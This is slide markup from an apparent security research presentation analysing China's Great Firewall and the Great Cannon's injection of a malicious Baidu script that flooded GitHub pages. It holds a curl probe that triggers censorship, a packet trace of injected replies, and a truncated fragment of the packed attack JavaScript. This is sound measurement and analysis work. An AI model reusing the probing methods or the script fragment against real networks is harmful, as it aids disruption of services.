          <a:ln w="8892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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915280" y="6545520"/>
            <a:ext cx="515520" cy="515520"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/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Line 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="12174120" y="5482800"/>
            <a:ext cx="360" cy="1160640"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="8892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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9707760" y="7247520"/>
            <a:ext cx="3495240" cy="8121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GET </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>/?falun</a:t>
            </a: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 HTTP/1.1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host: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>www.google.com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03" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9169920" y="5654160"/>
            <a:ext cx="4836240" cy="4770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Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>TCP RST: Terminate this flow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8" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1119" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1120" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1121" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11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4" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1125" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1126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46256 -0.001302">
                                      <p:cBhvr>
                                        <p:cTn id="1127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nodeType="after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246256 -0.001302 L 0.476276 -0.000000">
                                      <p:cBhvr>
                                        <p:cTn id="1133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131857">
                                      <p:cBhvr>
                                        <p:cTn id="1136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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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140" dur="1000" fill="hold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nodeType="after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 additive="repl">
                                        <p:cTn id="1144" dur="1000" fill="hold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2" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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nodeType="click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5445 0.116252">
                                      <p:cBhvr>
                                        <p:cTn id="1155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nodeType="withEffect" fill="hold" presetClass="path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95610 -0.000000">
                                      <p:cBhvr>
                                        <p:cTn id="1158" dur="22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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1170" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/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fill="hold"/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Features of the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 Firewall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20640" indent="-61812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Great Firewall is on-path</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="522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can detect and inject additional traffic, but not block the real requests from the server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="620640" indent="-61812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is single-sided</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="522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Assumes it can see only one side of the flow:</a:t>
            </a:r>
            <a:br/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Can send SYN, ACK, data, and get a response</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="620640" indent="-61812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is very stateful</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="522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Must first see the SYN and ACK, and reassembles out of order traffic</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="620640" indent="-61812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is multi-process parallel</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="522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~100 independent processes that load-balance traffic</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="620640" indent="-618120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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2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injected packets have a distinct side channel</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="522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Each process increments a counter for the TTL</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928080" indent="-62460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9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IP IDs are also “odd”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3950" spc="-1" strike="noStrike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5" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1176" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1177" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1178" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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4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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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8" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Validating that the 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Firewall is Still Great...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Easy test:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="888840" indent="-50544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curl --header "Host: www.google.com" http://{target}/?falun</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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Also built custom python scripts using scapy to traceroute location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Validated properties still hold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Doesn't block the reply from the server: </a:t>
            </a:r>
            <a:br/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it only adds resets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Still has crazy TTLs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Can still traceroute to the Great Firewall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Still is single sided and stateful: needs SYN, ACK, data to act</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1547640" indent="-78336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then goes into “stateless block” for ~1 minute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9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1" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1212" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1213" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1214" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1220" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1240" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1244" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1248" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Citizenfour documentary (2014)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7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800" spc="-1" strike="noStrike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550440" y="3178800"/>
            <a:ext cx="139878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  <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="18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Shows how Snowden met with journalists in Hong Kong</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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Snowden is still free today thanks to Tor and Tails and help from WikiLeaks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="864000" indent="-215640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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Revelations showed that NSA still had a hard time deanonymizing Tor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7373600" y="3554640"/>
            <a:ext cx="6616440" cy="971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Baidu Malicious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Scripts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550440" y="5686560"/>
            <a:ext cx="23334120" cy="7500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Baidu servers were serving a malicious script...</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="634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Packet with a standard JavaScript packer</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1486080" indent="-75168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Probably http://dean.edwards.name/packer/ with Base62 encoding</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="423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Payload is "keep grabbing https://github.com/greatfire and </a:t>
            </a:r>
            <a:br/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https://github.com/cn-nytimes"</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1486080" indent="-75168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Github quickly defanged the attack:  You first have to visit another page on Github for these pages to load</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4230" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Others quickly concluded the Great Firewall was responsible</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="634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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-23696640" y="3826440"/>
            <a:ext cx="71831160" cy="1423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urier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>eval(function(p,a,c,k,e,r){e=function(c){return(c&lt;a  ....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ourier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))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1" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1252" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1253" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1254" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1264" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12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fill="hold"/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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1268" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12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fill="hold"/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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1276" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 Malicious Reply For The Baidu Script Seemed "Odd"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550440" y="6838920"/>
            <a:ext cx="23334120" cy="6347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injected packets had incremented TTLs and similar funky IPID sequence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Great Firewall's side channel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second and third packets had bad ACK values and incrementing windows too</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="548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 dog that didn't bark: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 legitimate reply from the server!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4150" spc="-1" strike="noStrike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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3243600" y="3218400"/>
            <a:ext cx="17698680" cy="3553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(ttl 64,  id 12345) us &gt; Baidu: [S]   seq 0,                 win 8192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(ttl 47,  id 12345) Baidu &gt; us: [S.]  seq 0,        ack 1    win 8192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(ttl 64,  id 12346) us &gt; Baidu: [.]   seq 1         ack 1    win 8192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(ttl 64,  id 12346) us &gt; Baidu: [P.]  seq 1:119     ack 1    win 8192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ttl 201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,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id 55896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) Baidu &gt; us: [P.]  seq 1:108    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ack 119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 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win 767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ttl 202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,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id 55741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) Baidu &gt; us: [P.]  seq 108:1132 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ack 1 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  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win 768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IP (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ttl 203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,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id 55699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) Baidu &gt; us: [FP.] seq 1132:1238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ack 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff2600"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>win 769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9" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1280" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1281" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1282" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1288" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1292" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1300" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Eureka Moment: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Two Fetches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Built a custom python script using scapy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Connect to server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Send request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Wait 2 seconds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Resend the same request packet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What happens?  The real server replied!?!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first request was attacked by the cannon and replaced with a malicious payload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second request passed through unmolested to the real server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1547640" indent="-78336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Whose reply indicated it never received the original request!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20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03" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1304" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1305" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1306" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1312" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1316" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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fill="hold"/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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1320" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1324" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1328" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1332" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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4" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1340" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 Now Its Time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To Categorize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Send "valid target" request split over 3 packets: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Ignored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Send "Naked packets": just a TCP data payload without the initial SYN or ACK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May trigger response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Send "No target than valid target"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Ignored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Retry ignored request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Ignored (at least for a while...)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4150" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652320" indent="-64980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48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One over from target IP</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5480" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="974880" indent="-65628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1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Ignored</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4150" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423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43" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1344" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1345" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1346" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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fill="hold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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1352" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1356" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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8" fill="hold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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1360" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1368" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1376" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1380" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1384" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Tells us the basic structure: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Flow Cache and Stateless Decider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Non data packets: Ignore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Packets to other IPs: Ignore</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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 packet on new flow:</a:t>
            </a:r>
            <a:br/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Examine first packet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matches target criteria AND flip-a-coin (roughly 2% chance): Return exploit and drop requesting packet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 packet on existing flow (flow cache): Ignore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Even if it decided to inject a packet in this flow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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1388" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1389" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1390" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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fill="hold"/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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1396" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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8" fill="hold"/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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1400" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Localizing the 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Cannon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Traceroute both for the cannon and for the Great Firewall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TTL limited data for the Cannon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TTL limited SYN, ACK, DATA for the firewall</a:t>
            </a:r>
